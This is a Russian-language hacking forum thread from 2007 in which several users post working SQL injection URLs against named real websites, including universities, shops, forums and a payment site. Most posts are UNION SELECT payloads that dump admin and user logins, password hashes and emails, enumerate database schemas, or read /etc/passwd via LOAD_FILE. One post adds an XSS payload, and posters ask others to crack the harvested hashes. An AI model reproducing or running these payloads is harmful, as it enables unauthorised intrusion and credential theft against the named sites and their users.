SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Официальный сайт Полины Гагариной певица и просто красивая девушка :)

    код:
    http://www.gagarina.com/news.php?id=-41+union+select+1,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),3,4,5,6+from+phpbb_users+limit+1,1/*
    свыше 200 юзеров,
    не разобрался в какой кодировке пароли :(
    md5^^
     
    #3061 sasTO, 8 Sep 2007
    Last edited by a moderator: 9 Sep 2007
    2 people like this.
  2. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    sql

    Code:
    http://www.si.umich.edu/CHICO/instrument/fullrecord.phtml?id=9999+union+select+1,2, USER(),4,5,VERSION(),7,8,9,DATABASE(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
    user [email protected]
    version 4.0.13
    database chico


    Code:
    http://www.law.harvard.edu/faculty/directory/facdir.php?id=-1+ union+select+concat(user(),0x3a,version(),0x3a,database())/*
    user facdir@hlssun1
    version 4.0.20-log
    database academics


    Code:
    http://www.kievsex.com/shop/?cat_id=99999+union+select+1,concat(username,0x3a,user_password,0x3a,user_ email,0x3a,user_icq),3,4,5,6,7,8,9,10+from+phpbb_ users+limit+1,1/*
    мож кто расшифрует...

    Code:
    http://asya-club.ru/board/message.php?id=-1+union+select+1,2,version(),user(),5,6, database(),8/*
    version 5.0.41-log
    user arigato@localhost
    database asyaclu5_chateng


    _http://asya-club.ru/board/message.php?id=-1+union+select+1,2,user,4,password,6,7,8+from+mysql. user/*

    root:02462cca620de2cd

    _hxxp://asya-club.ru/board/message.php?id=-1+union+select+1,2,3,4,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),6,7,8/*
    _http://asya-club.ru/board/message.php?id=-1+union+select+1,2,3,4,pwd,6,login,8+from+administrators/*
     
    #3062 Maxyks, 9 Sep 2007
    Last edited: 9 Sep 2007
    2 people like this.
  3. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    InterComp - Все о компьютерах и для вашего компьютера (hardware, software)

    Code:
    http://intercomp.net.ru/dll/file.php?id=-1+union+select+1,2,concat(username,0x3a,user_password ,0x3a,user_email,0x3a,user_icq),4+from+phpbb_users+limit+1,1/*
    вывод под фразой "Описание DLL"...
    Code:
    http://www.inso.edu.ru/seminars/info.phtml?id=-1+union+select+1,2,3,4,USER(),VERSION(),7,8,DATABASE( ),10,11,12,13,14,15,16,17,18,19,20/*
    user [email protected]
    version 4.0.27-log
    database mlogos
     
    1 person likes this.
  4. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    .ro

    пройдемся по Румынии:

    _htp://ori.utcluj.ro/burse/detalii_bursa.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
    подбираем столбец и таблицу:
    Code:
    http://ori.utcluj.ro/burse/detalii_bursa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(column_name,0x3a,table_name),16,17,18+from+INFORMATION_SCHEMA.COLUMNS+limit+160,1/*
    выводим логин:пароль админа:

    _http://ori.utcluj.ro/burse/detalii_ bursa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password),16,17,18+from+adabsolutum_admin/*
     
    #3064 Maxyks, 9 Sep 2007
    Last edited: 9 Sep 2007
  5. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    АРТЕК :)
    в детстве очень мечтал туда попасть...


    код:


    http://www.artek.org/index.phtml?ID=-101101+union+select+1,2,3,4,5,6,7,concat(uname,char(58),sname,char(58),nick,char(58),email,char(58),password),9,10,11,12,13,14+from+artekovtsi+limit+7,1/*
     
  6. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Code:
    https://maps.tva.com/scripts/store/cart.asp?ID=1+or+1=(SELECT+TOP+1+Username+FROM+Login)--
    колонка с паролями - Password
     
  7. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    popmech.ru
    4.0.26:popmech:p[email protected]
    Code:
    http://www.popmech.ru/part/?articleid=2195+UNION+SELECT+concat(name,char(58),password)+from+users+--+&rubricid=4
     
    1 person likes this.
  8. f1rebl00d

    f1rebl00d Elder - Старейшина

    Joined:
    27 Dec 2006
    Messages:
    25
    Likes Received:
    34
    Reputations:
    15
    http://www.generationrice.com/index.phtml?talk=carlnomura_-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
     
    2 people like this.
  9. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Биржа РаботЪ код: http://www.rubler.ru/users/user.phtml?id=-20+union+select+1,2,3,4,concat(login,char(58),email,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+rf+limit+3691,1/* в бд 3691 юзер,пароли в открытом виде :wink:
     
    1 person likes this.
  10. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://buy-sell.in/fullnews.php?id=-1+union+select+1,email,3,4,password+from+members+limit+31,1/*
    мускул 4, вход по имэйл, юзеров 31 =\
     
    1 person likes this.
  11. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.realkerala.in/detail.php?id=999+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(column_name,0x3a,table_name,0x3a),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+INFORMATION_SCHEMA.COLUMNS+limit+1,1/*/*
    PR 4
     
  12. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    красивый сайт
    Code:
    http://www.femina.in/viewpost.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71 ),0x71),3, 4,5,6,7,8,9,10,11,12,13,14,15/*
    а форум еще лучше =)

    Code:
    http://www.femina.in/viewpost.php?id=-1+union+select+1,concat(username,0x3a,user_password,0x3a,user_email,0x3a, user_icq),3,4,5,6,7,8,9,10,11,12,13,14,15+ from+phpbb_users+limit+1,1/*
     
  13. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    edu.in

    Code:
    http://www.vedanta.[SIZE=2][COLOR=Green]edu[/COLOR][/SIZE].in/page.php?id=-2+union+select+ 1,2,concat( user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14/*
    табличка и колонка:
    Code:
    htp://www.vedanta.edu.in/page.php?id=-2+union+select+1,2,3,4,5,6,concat(column_name,0x3a,table_ name, 0 x3a),8,9,10,11,12,13,14+from+ INFORMATION_SCHEMA.COLUMNS+ lim it+160,1/*
    а вот сами логин + хэш =)
    Code:
    http://www.vedanta.edu.in /page.php?id=-2+union+ select+1,2,[COLOR=Teal]username[/COLOR],4,5,6,[COLOR=Teal]password[/COLOR],8, 9,10,11,12,13,14+from+ [COLOR=SeaGreen]admin[/COLOR]/*
     
    2 people like this.
  14. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    везде 4 мускл...

     
    1 person likes this.
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    вывод в пути к картинке
    инжекты во всех параметрах =\
     
    #3075 Spyder, 11 Sep 2007
    Last edited: 11 Sep 2007
    3 people like this.
  16. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    .EDU

    красивая скуля, код:
    http://webmaster.upi.edu/~ghmahendra/wap/newsdetail.php?id=-21+union+select+1,2,CAST(concat(column_name,char(58),table_name)+AS+BINARY),4+from+information_schema.columns/*

    нашел только это, код:

    http://webmaster.upi.edu/~ghmahendra/wap/newsdetail.php?id=-21+union+select+1,2,concat(username,password),4+from+admina/* кто доработает?
     
    3 people like this.
  17. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    https://ssl.paycash.ua/cgi-bin/error.cgi?code=-300%20union%20select%20'Это%20в<script>alert("XSS")</script>ывод'
    Нашел вот такую скулю (впервые в cgi скрипте). Единственное что придумал это ХСС. Извесны таблицы errors и partners. Больше вытянуть ничего не удалось. А может и нету тут нифига. Кто найдет, расскажите ;)
     
  18. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    А такие скули стоит выкладывать?


    код:


    http://wap.sarbc.ru/news/shownews.phtml?id=-71891+union+select+1,2,3,4,concat(char(58),char(58),char(58),char(58),char(58),name,char(58),passwd),6,7,8,9,10,11,12+from+user+limit+1,1/*

    p.s At me today birthday :)
     
    #3078 sasTO, 13 Sep 2007
    Last edited: 13 Sep 2007
    2 people like this.
  19. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.kraak.net/en/releases.php?ID=-31+union+select+1,2,3,4,concat(username,0x3a,userpassword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+user/*
     
    4 people like this.
  20. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    eitc.edu
    eitc@localhost|4.1.20|eitc
     
    1 person likes this.
Thread Status:
Not open for further replies.